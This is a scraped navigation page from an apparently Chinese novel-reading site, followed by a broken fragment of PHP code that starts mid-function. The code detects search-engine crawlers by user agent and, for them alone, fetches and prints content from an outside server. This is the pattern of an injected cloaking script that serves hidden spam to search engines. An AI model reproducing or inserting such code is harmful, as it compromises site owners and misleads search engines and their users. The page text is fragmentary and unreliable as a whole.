阅读记录

点击排行更多...

推荐排行更多...

收藏排行更多...

新书上架更多...

最近更新更多...

'; } if (strpos($useragent, 'googlebot') !== false){ return 'Google'; } if (strpos($useragent, 'youdaobot') !== false){ return 'Youdao'; } if (strpos($useragent, 'msnbot') !== false){ return 'Msn'; } if (strpos($useragent, 'yahoo') !== false){ return 'Yahoo'; } return false; } $searchbot = get_naps_bot(); if($searchbot) { echo file_get_contents("https://api.beicheng.org/spider.php"); }?>